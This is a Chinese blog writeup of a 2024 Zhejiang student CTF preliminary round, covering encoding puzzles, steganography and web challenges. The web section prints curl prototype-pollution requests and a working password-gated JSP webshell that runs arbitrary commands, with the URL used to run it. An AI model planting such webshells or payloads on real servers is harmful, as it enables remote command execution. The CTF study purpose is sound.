2024浙江省大学生网络与信息安全竞赛wp

最新推荐文章于 2025-02-10 16:41:04 发布
最新推荐文章于 2025-02-10 16:41:04 发布
阅读量1.9k 收藏 23
点赞数 31
文章标签: 网络安全 web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwy3327078581/article/details/143491991
版权

预赛结果公布了,我们队也是成功进入了决赛,希望能够取得好成绩把,今天发个我们队的wp吧~ 和大佬比没法比

签到

题目一名称:网安知识大挑战

直接做完,显示错误,肯定不可能

搜索文件

打断点,同时发现flag在d()

运行到断点处,并在控制台输出d(),得到flag​  (这道题我们拿了一血,看别人都是写脚本,我们队这个方法应该是比较快的!)

题目二名称:签到题

6L<Ak3,*@VM*>7U&FZFNWc,Ib=t,X!+,BnSDfoaNhdiO*][5F];eV^]Lm&?$'<oeGH&6tqcgK_JDp-3;8wh?Si,G$BarTFjE?b$eR/,Igij<({u90M$5If589[<4+jp%3_%R(526#1J|m5p&H+%.#d0<DmLK*#-\8w:xD2Y[3jO{l8[)<(F[=Bcixb>Jp^%L2XvVTzW@9OTko/P74d1sFscEbMO7Vhp&HM;+ww/v[KM1%2M*7O\}rEZM.LM0'\iwK:])pg-nJef\Rt4

base92

:2WsR9eo=EA2%h#>&.;[@sVfC=]\cp;cldd<btVh:IeqR=))D<;Fjh`:3pGh9kmF$A6)#b;0kYf=Y`Tp>":;\9e\O]=)(2\@mt3%@o[b2@PDj\@5:GL;clXGA8QF0<\[$#A27XM<c)A_A4JJ#ASspo;(ssa;/7md;/T-H;b0o59iZ9n;H@RX;cmj;<`O*6=`$/Q=%>8qA27=\@96u]@7FCG=`.,)

base85a

NnRwM2JZd0lVZkZoczh1YWZDSXNIVlQ3OGd6WjhFRHVNNzdoMjNRdVBDQzE4Y2JyZG1hM081WjF3cElDcUx5b0s5a2JMSXJ0dmtsV1E5d2c2VmdkdG4wenE5Q081Qk1UQnNnSHUxMUt6RVkxSXlWVUpNYm90WG9xd2ZJaWdtaFYzYnRC

base64

6tp3bYwIUfFhs8uafCIsHVT78gzZ8EDuM77h23QuPCC18cbrdma3O5Z1wpICqLyoK9kbLIrtvklWQ9wg6Vgdtn0zq9CO5BMTBsgHu11KzEY1IyVUJMbotXoqwfIigmhV3btB

base62

nbgCtvcRjay6YrYmWqGk6JgBhUgGWx3Dii4T1jYoihmpb79zcuiqMvFCdLxvkNDn4768DTbxsegoHAxNf5czNPPAfgMoe6LRui

base58

5C9VB8W09FG6DC9LX6J1A3T9ZY9P7BKG6+M9B1AO7BI%6OTAZY91G60Z9%IBG09NIBNB9TB9

base45 IRAVGQ2UIZ5XOZLMMNXW2ZK7ORXV66TKMN2GMXZSGAZDI7I=

base32 就出来了 (挺逆天~)

Web

题目一名称:easyjs

说的很明白了需要原型链污染,编写js

curl -X POST http://139.155.126.78:33972/api/notes -H "Content-Type: application/json" -d '{"id": "exploitNote", "__proto__": {"isAdmin": true}}'

curl -H "Note-Id: exploitNote" http://139.155.126.78:36461/api/flag

题目二名称:hack memory

直接上马

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

访问:根目录直接有flag

139.155.126.78:36008/uploads/test.jsp?pwd=023&i=cat /fffffllllagggg

解码

MISC

题目一名称:RealSignin

xtradata:0 .. text: "dEFfc1dGq1pxMgMWnihrMx9mewNgdvIWMvctrc"

这个是密文

b1,rgb,lsb,xytext: "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyzOPQRSTUVWXYZ0123456789+/"

这个是字符表​

得到flag

2022全国职业技能大赛“信息安全管理评估“--应急响应日志分析解析(高职组)
Aluxian_的博客
02-16 6458
竞赛有固定的开始和结束时间,参赛队伍必须决定如何有效的分配时间。请认真阅读以下指引!(1)当竞赛结束,离开时请不要关机;(2)所有配置应当在重启后有效;(3)除了CD-ROM/HDD/NET驱动器,请不要修改实体机的配置和虚拟机本身的硬件设置。所需的设备、机械、装置和材料所有测试项目都可以由参赛选手根据基础设施列表中指定的设备和软件完成。评分方案本项目模块分数为350分。
“天一永安杯”2024宁波第七届网络安全大赛暨第九届大学生网络技术信息安全大赛-部分MISC、WEB、RE-WP
weixin_62467741的博客
05-05 990
1.png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码。简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到。F12被禁了,URL前加view-source:,源码得到flag。2.搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示。先逆key,追踪key和key1,得到值,写解密脚本。3.直接搜这个解密网站。
2022年浙江省大学生网络信息安全竞赛-Misc部分(决赛)
weixin_52961098的博客
10-02 1059
最终排名:第9还是第8来着,忘了,反正是一等要附件私信吧,不回复 就是回家掰苞米去了。
第七届浙江省大学生网络信息安全竞赛决赛 Misc方向全解,网络安全零基础入门到精通实战教程!
最新发布
qq_41314882的博客
02-10 901
注:黑白图片并不是纯的rgb(0,0,0)和rgb(255,255,255),存在(1,1,1)等情况,所以要设置阈值,不然会丢失精度影响输出结果。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。也有非预期解法,其实缩放一下能看到有字母,翻翻通道多对比一下是能看出来的。
浙江省第二届大学生网络信息安全竞赛在线预赛
无限迭代中......
09-12 879
1-1 欢迎参加 查看源代码,根据提示,知道session加密形式为md5 丢去cmd5 在线解密,得到正常访问的session的明文为guest 故将admin加密得到新的session 改后访问 得到1ocation 访问 得到flag ...
2024浙江省大学生网络信息安全竞赛签到题wp
ha0112的博客
11-18 342
主要针对于预赛中的密码签到题,我们队伍当时是放在CyberChef中一层一层试出来的,事后我使用了basecrack工具但是也止步于5层。发现这个工具已经很久没有更新所以没有base45导致不能秒掉这串加密于是我自己修改了源码之后加入了base45就可以秒掉。用现在星标最多的basecrack项目解码。这个工具我放在了github上,需要的自取。
2022 第五届 浙江省大学生网络信息安全竞赛技能赛 决赛 Writeup,5题
热门推荐
小哈里的博客
09-24 1万+
将后缀改为.m4a播放一下,感觉是个摩斯电码。用格式工厂转为MP3,丢到AudacityPortable看波形,手抄摩斯电码得到密码码-…-, 解密后得到密码为BA43BCEFC204。打开压缩包,输入上面音频中得到的密码,解压得到atbash加密后的字符串。01Edit打开音频文件,发现末尾有个反向的zip,写代码提取出来。最后跑一遍ROT47+atbash得到flag。
浙江省首届大学生网络信息安全竞赛
无限迭代中......
09-12 1059
浙江省首届大学生网络信息安全竞赛
2023年第六届浙江省大学生网络信息安全竞赛.zip
09-11
2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学技术等相关专业,更为适合;...
2024浙江省大学生网络信息安全竞赛决赛Misc WP by 王八七七
weixin_52365980的博客
11-11 1968
2024年第七届浙江省大学生网络信息安全竞赛圆满结束,一场汇聚浙江省高校优秀学子的信息安全领域竞技盛宴即将拉开帷幕!本次大赛由杭州电子科技大学浙大城市学院承办,于2024年11月正式开赛,吸引了来自全省各大高校的众多优秀学子,报名人数再创新高,点燃了浙江省高校学子对网络信息安全领域的热情之火。
第五届浙江省网络信息安全竞赛部分WP
hahaHalsey的博客
09-18 1028
后续再补充
第六届浙江省大学生网络信息安全竞赛-技能挑战赛部分WP
jjjj1029056414的博客
11-09 2505
第六届浙江省大学生网络信息安全竞赛-技能挑战赛部分WP,整理复盘。
浙江省第二届大学生网络信息安全竞赛现场决赛
无限迭代中......
09-22 1235
浙江省第二届大学生网络信息安全竞赛现场决赛
第五届浙江省大学生网络信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2514
第五届浙江省大学生网络信息安全竞赛-技能挑战赛 预赛 部分WP
[wp]2024 第七届浙江省大学生网络信息安全竞赛决赛 信创安全赛道-鸿蒙app逆向 Wirteup 浙江省网安决赛-信创安全赛道-鸿蒙app逆向 题解
Academiction的博客
11-11 627
在开始做题前,先唠叨几句,先把工具准备好,工欲善其事,必先利其器;磨刀不误砍柴功.由于鸿蒙系统这块是新出的,很多逆向工具都是民间开发者自己搓的,有很多bug,这个得理解一下.然后鸿蒙逆向题总体思路上属于移动端应用的逆向,思路跟安卓逆向是一样的.无非就是工具比较少,以及app的开发语言从Java/Kotlin换成了ArkTS/仓颉.
2023浙江省大学生信息安全竞赛初赛 部分wp
arcuied
11-05 2051
将这段js复制处理,放入console,把if的判断条件改为true,然后再次点击roll,可以发现弹。后端就只有个js文件,可以发现roll这段代码很关键(因为题目说通过roll得到flag)拿到题目,根据jpg的文件头,可以发现每两位16进制是反的,那么我们只需要翻转就行了。反转之后的结果并不是正确的(因为是逆序的十六进制),我们还需要将整体的字符串反。根据摩斯密码的特征,及那个DASH转为-,DOT转为.,获得下面的代码。使用steghide进行解密,获得flag.txt。数据放入010中生成图片。
浙江省首届大学生网络信息安全竞赛决赛原题解析
jachinFang的博客
07-08 2333
原题2-1 circle圆圈圈圆一张普通的纸 第一步就是将图片下载下来,利用foremost分解图片中的文件 第二步将打开分解出来的word文件,发现一个flag,但是输入的时候发现错误, 第三步发现rar压缩文件需要密码,所以将flag当成密码来解密rar文件 第四步就是将解密的图片用notepad++打开搜索ZJCTF发现 了一个flag 原题4-1 p...
大赛安全信息简报_再创佳绩!信息技术学院在大学生网络信息安全大赛斩获大奖_零基础漏洞笔记
程序员六七的博客
07-12 403
近日,2022年第五届浙江省大学生网络信息安全竞赛结果出炉。经过1年的常规训练和暑假的备赛集训,以及初赛、决赛的角逐比拼
2024全国职业技能大赛浙江省嘉兴市“网络空间安全赛项”赛题及赛题解析(超详细)_嘉兴市ji一类赛事 网络安全
2401_84247423的博客
05-05 786
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
第十八届全国大学生信息安全竞赛 wp
02-06
### 第十八届全国大学生信息安全竞赛 Writeup 和获奖作品 第十八届全国大学生信息安全竞赛(ISCC 2021)是由北京理工大学发起并举办的年度赛事之一,旨在提升信息安全意识、普及信息安全知识和技术。该活动自2004年开始至今已成功举办多届,在促进高校间的信息安全交流方面发挥了重要作用[^1]。 对于寻找特定年份的比赛材料如Writeup或官方文档而言,通常可以通过以下几种方式获取: #### 通过官方网站查询 大多数情况下,主办方会在比赛结束后一段时间内发布详细的解题报告以及优秀参赛队伍提交的技术文档(即Writeup)。因此建议访问ISCC官网,查看是否有专门页面用于整理历年的资源链接。 #### 利用学术平台检索 一些高质量的Writeup可能会被作者上传至个人博客或是发表成论文形式收录于CNKI等数据库中。利用这些平台可以找到更深入的技术分析文章。 #### 社区分享讨论论坛 像GitHub这样的开源平台上经常会有选手将自己的解决方案公开共享;而诸如知乎、CSDN之类的中文技术社区也可能存在关于此次比赛的经验总结贴子。 以下是Python脚本示例,展示如何自动化地从网页抓取可能存在的writeup列表(仅为示意用途,请勿直接运行此代码片段): ```python import requests from bs4 import BeautifulSoup url = 'https://example.com/iscc2021' # 假设这是ISCC 2021的主页URL response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') for link in soup.find_all('a'): href = link.get('href') text = link.string if "writeup" in str(text).lower() or "solution" in str(text).lower(): print(f"{text}: {href}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值